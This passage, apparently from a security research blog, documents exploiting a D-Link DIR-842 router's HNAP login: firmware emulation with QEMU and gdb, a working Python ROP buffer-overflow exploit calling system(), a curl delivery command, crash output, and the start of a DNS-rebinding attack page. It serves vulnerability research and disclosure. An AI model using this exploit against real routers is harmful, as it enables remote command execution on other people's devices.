#7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">REQUET_METHOD</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"POST"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">HTTP_COOKIE</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"uid=99TIA1AP7"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">CONTENT_LENGTH</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">2640</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">CONTENT_TYPE</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"text/xml; charset=utf-8"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-g</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">4444</span> ./htdocs/HNAP1/hnap</span></pre><span style="font-family: helvetica;">Following the description of the used parameters:<br /><ul style="text-align: left;"><li><span style="font-family: helvetica;"><i>chroot</i>: the full command was executed within the root directory of the extracted <i>squash-fs</i> filesystem, so <i>chroot .</i> makes this directory the root directory;</span></li><li><span style="font-family: helvetica;"><i>qemu-mips-static</i>: allows to emulate MIPS binaries. The "-E" options was used to set some environment variables required by "hnap" to regularly invoke the vulnerable method; "-g" sets the "QEMU_GDB" environment variable that opens a <i>gdb-server</i> on the specified port (in this case port 4444).</span></li></ul></span></div><div><span style="font-family: helvetica;"><br />It was then possible to attach to the <i>gdb-server</i> running on "localhost:4444" and debugging the target binary using <i>gdb-multiarch</i> as follows:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n83" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="bash" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">$ gdb</span><span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-multiarch</span> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">GNU gdb (Ubuntu <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">8</span>.1-0ubuntu3.2) <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">8</span>.1.0.20180409-git</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Copyright (C) <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">2018</span> Free Software Foundation, Inc.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">License GPLv3<span class="cm-operator" style="box-sizing: border-box;">+</span>: GNU GPL version <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">3</span> or later <http://gnu.org/licenses/gpl.html></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">This is free software: you are free to change and redistribute it.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">There is NO WARRANTY, to the extent permitted by law. Type <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"show copying"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">and <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"show warranty"</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">for</span> details.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">This GDB was configured as <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"x86_64-linux-gnu"</span>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Type <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"show configuration"</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">for</span> configuration details.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">For bug reporting instructions, please see:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><http://www.gnu.org/software/gdb/bugs/>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Find the GDB manual and other documentation resources online at:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><http://www.gnu.org/software/gdb/documentation/>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">For help, type <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"help"</span>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Type <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"apropos word"</span> to search <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">for</span> commands related to <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"word"</span>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">(gdb) file htdocs/HNAP1/hnap </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Reading symbols from htdocs/HNAP1/hnap...(no debugging symbols found)...done.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">(gdb) target remote <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">127</span>.0.0.1:4444</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Remote debugging using <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">127</span>.0.0.1:4444</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">warning: remote target does not support file transfer, attempting to access files from local filesystem.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Reading symbols from ~/firmware/fwrs/_DIR-842_C1_FW300b18.bin.extracted/squashfs-root/lib/ld-uClibc-0.9.33.2.so...(no debugging symbols found)...done.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">0x7f7e7f90 <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">in</span> _start () from ~/firmware/fwrs/_DIR-842_C1_FW300b18.bin.extracted/squashfs-root/lib/ld-uClibc-0.9.33.2.so</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">(gdb) c</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Continuing.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; font-size: 1.17rem; letter-spacing: -1px; line-height: 1.5rem; margin: 0px 0px 1.5rem; orphans: 4; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left; white-space: pre-wrap;"><b><span style="font-family: helvetica; font-size: small;"><br /></span></b></h4><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; font-size: 1.17rem; letter-spacing: -1px; line-height: 1.5rem; margin: 0px 0px 1.5rem; orphans: 4; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left; white-space: pre-wrap;"><b><span style="font-family: helvetica; font-size: small;">A working Buffer Overflow exploit</span></b></h4><span style="font-family: helvetica;">After some digging into the analysis both user-mode and system-mode, we got a running ROP exploit that allowed us to execute an arbitrary command by jumping to the <i>ld-uClibc-0.9.33.2</i> <i>system()</i> function:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n86" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="python" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">from</span> <span class="cm-variable" style="box-sizing: border-box;">pwn</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">import</span> <span class="cm-operator" style="box-sizing: border-box;">*</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">def</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">p32_big</span>(<span class="cm-variable" style="box-sizing: border-box;">data</span>):</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">return</span> <span class="cm-variable" style="box-sizing: border-box;">p32</span>(<span class="cm-variable" style="box-sizing: border-box;">data</span>, <span class="cm-variable" style="box-sizing: border-box;">endian</span> = <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'big'</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">libc_text_base</span> = <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x2aae4000</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">libc_text_start</span> = <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x0</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">libc_system</span> = <span class="cm-variable" style="box-sizing: border-box;">libc_text_base</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> (<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x00062104</span> <span class="cm-operator" style="box-sizing: border-box;">-</span> <span class="cm-variable" style="box-sizing: border-box;">libc_text_start</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">gadget1</span> = <span class="cm-variable" style="box-sizing: border-box;">libc_text_base</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> (<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x00042e08</span> <span class="cm-operator" style="box-sizing: border-box;">-</span> <span class="cm-variable" style="box-sizing: border-box;">libc_text_start</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-comment" style="box-sizing: border-box; color: #da924a;"># identified gadget</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-comment" style="box-sizing: border-box; color: #da924a;"># 0x00042e08 : sw $v0, 0xa8($sp) ; addiu $a0, $sp, 0xb8 ; lw $t9, 0x24($sp) ; jalr $t9 ; move $a1, $s6</span></span><br /><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> = <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"A"</span> <span class="cm-operator" style="box-sizing: border-box;">*</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1028</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-variable" style="box-sizing: border-box;">p32_big</span>(<span class="cm-variable" style="box-sizing: border-box;">gadget1</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"BBBB"</span> <span class="cm-comment" style="box-sizing: border-box; color: #da924a;"># $sp points here</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"C"</span> <span class="cm-operator" style="box-sizing: border-box;">*</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">32</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-variable" style="box-sizing: border-box;">p32_big</span>(<span class="cm-variable" style="box-sizing: border-box;">libc_system</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"C"</span> <span class="cm-operator" style="box-sizing: border-box;">*</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">144</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"touch /tmp/minded;"</span> <span class="cm-comment" style="box-sizing: border-box; color: #da924a;"># here the command to execute</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">soap_body</span> = <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>request</Action><Username>Admin</Username><LoginPassword>"</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-variable" style="box-sizing: border-box;">payload</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"</LoginPassword><Captcha></Captcha></Login></soap:Body></soap:Envelope>"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-builtin" style="box-sizing: border-box; color: #f3b3f8;">print</span>(<span class="cm-variable" style="box-sizing: border-box;">soap_body</span>)</span></span></pre></div><div><span style="font-family: helvetica;"><br /></span></div><div><p cid="n87" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative;"><span style="font-family: helvetica;">The following gadget was found in the libc address and used to perform a return-to-system:<br /><br /></span></p><pre cid="n86" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="python" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-comment" style="box-sizing: border-box; color: #da924a;">0x00042e08 : sw $v0, 0xa8($sp) ; addiu $a0, $sp, 0xb8 ; lw $t9, 0x24($sp) ; jalr $t9 ; move $a1, $s6</span></span></span></pre><span style="font-family: helvetica;"><span class="md-softbreak" md-inline="softbreak" style="box-sizing: border-box;">
</span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The gadget allows to jump to the next instruction through </span><span class="md-pair-s" md-inline="code" spellcheck="false" style="box-sizing: border-box;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; box-sizing: border-box; font-size: 0.875rem; padding: 2px 5px; vertical-align: initial;"><span style="color: #e06666;">jalr $t9</span></code></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> and </span><span class="md-pair-s" md-inline="code" spellcheck="false" style="box-sizing: border-box;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; box-sizing: border-box; font-size: 0.875rem; padding: 2px 5px; vertical-align: initial;"><span style="color: #e06666;">lw $t9</span>, <span style="color: #e06666;">0x24($sp)</span></code></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">; so we put the address </span><span style="box-sizing: border-box;">of <i>system()</i> 36 bytes aft</span><span class="md-plain" md-inline="plain"><span style="box-sizing: border-box;">er the current pointed address. </span></span></span></div><div><span style="font-family: helvetica;"><span class="md-plain" md-inline="plain"><span style="box-sizing: border-box;"><br /></span></span></span></div><div><span style="font-family: helvetica;"><span class="md-plain" md-inline="plain"><span style="box-sizing: border-box;">The argument of </span></span><span style="box-sizing: border-box;"><i>system()</i>, was prev</span><span class="md-plain" md-inline="plain"><span style="box-sizing: border-box;">iously controlled thanks to </span></span><span class="md-pair-s" md-inline="code" spellcheck="false" style="box-sizing: border-box;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; box-sizing: border-box; font-size: 0.875rem; padding: 2px 5px; vertical-align: initial;"><span style="color: #e06666;">addiu $a0, $sp, 0xb8</span></code></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">, which points to the stack location that contains the command to execute.</span></span><p></p><span style="font-family: helvetica;">Once adjusted the <i>libc</i> base address according to the system-mode, we could test the exploit by using <i>curl</i> (the body file contains the output of the python exploit):</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n89" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="bash" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">$ curl</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-X</span> POST <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-d</span> @body http://192.168.0.1/HNAP1/ <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-H</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'SOAPAction: http://purenetworks.com/HNAP1/Login'</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-H</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'HNAP_AUTH: 7A6EA9269CBB71629F4EF2926343C7A1 1583173034'</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-H</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'Content-Type: text/xml; charset=utf-8'</span></span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><br /><title>500 Internal Server Error</title></span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><h1>500 Internal Server Error</h1></span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><span style="font-family: helvetica;"><br /></span><div style="text-align: left;"><span style="font-family: helvetica;">The "touch /tmp/minded" command was successfully executed as this file was written in the "/tmp" directory of the emulated firmware. </span></div><div style="text-align: left;"><span style="font-family: helvetica;"><br /></span></div><div style="text-align: left;"><span style="font-family: helvetica;">The following output is related to <i>FAT</i> and shows the emulated router console exposing the <i>SIGSEGV</i> crash caused by the running exploit. </span></div></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n91" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"># [ 5278.120000] do_page_fault() #2: sending SIGSEGV to hnap for invalid read access from</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] 68202f90 (epc == 2ab26e20, ra == 2ab26e1c)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] Cpu 0</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] $ 0 : 00000000 1000a400 68202f74 00000001</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] $ 4 : 2ab64000 7f80be50 00000000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] $ 8 : 00000000 80104960 8f06cc98 0000000a</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $12 : 00000008 811e41c0 00000000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $16 : 7f80cd88 2ab44000 004013b8 0049e444</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $20 : 00487ec0 0049e88c 004a0000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $24 : 8f3cc4f0 2ab1db80 </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $28 : 2ab65400 7f80bea0 41414141 2ab26e1c</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Hi : 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Lo : 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] epc : 2ab26e20 0x2ab26e20</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Not tainted</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] ra : 2ab26e1c 0x2ab26e1c</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Status: 0000a413 USER EXL IE </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Cause : 10800008</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] BadVA : 68202f90</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] PrId : 00019300 (MIPS 24Kc)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Modules linked in:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Process hnap (pid: 20107, threadinfo=8f1b6000, task=8f2bd6e0, tls=2aab7440)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Stack : 42424242 43434343 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] 43434343 2ab46104 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] 43434343 43434343 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] 43434343 43434343 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] 43434343 43434343 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] ...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] Call Trace:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] Code: 0320f809 02c02821 8fa200bc <8c59001c> 13200004 8fbc0018 0320f809 27a400b8 8fbc0018 </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] hnap/20107: potentially unexpected fatal signal 11.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] Cpu 0</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] $ 0 : 00000000 1000a400 68202f74 00000001</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $ 4 : 2ab64000 7f80be50 00000000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $ 8 : 00000000 80104960 8f06cc98 0000000a</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $12 : 00000008 811e41c0 00000000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $16 : 7f80cd88 2ab44000 004013b8 0049e444</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $20 : 00487ec0 0049e88c 004a0000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $24 : 8f3cc4f0 2ab1db80 </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $28 : 2ab65400 7f80bea0 41414141 2ab26e1c</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Hi : 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Lo : 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] epc : 2ab26e20 0x2ab26e20</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Not tainted</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] ra : 2ab26e1c 0x2ab26e1c</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Status: 0000a413 USER EXL IE </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Cause : 10800008</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] BadVA : 68202f90</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] PrId : 00019300 (MIPS 24Kc)</span></span></pre><div><span style="font-family: helvetica;">Following the proof of the execution of the <i>touch</i> command (of the <i>minded</i> file).</span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;"><pre cid="n91" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"># ls /tmp/</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span style="color: #b8bfc6;">server.key wburfe wifi0.caldata </span><span style="color: #04ff00;"><b><i>minded</i></b></span></span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;">server.crt hapfie wifi1.caldata</span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><div><br /></div></span></div><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; letter-spacing: -1px; line-height: 1.5rem; margin: 0px 0px 1.5rem; orphans: 4; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left; white-space: pre-wrap;"><span style="font-family: helvetica;">Remote Command Execution through DNS Rebinding attack</span></h4><span style="font-family: helvetica;">It was then possible to embed the generated payload inside an <i>xhr</i> SOAP request in the <i>DNS Rebinding</i> HTML attack page we used in the </span><a href="https://blog.mindedsecurity.com/2021/02/journey-into-beauty-of-dnsrebinding.html" style="font-family: helvetica;" target="_blank">first</a><span style="font-family: helvetica;"> part:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n93" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="html" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">html</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span 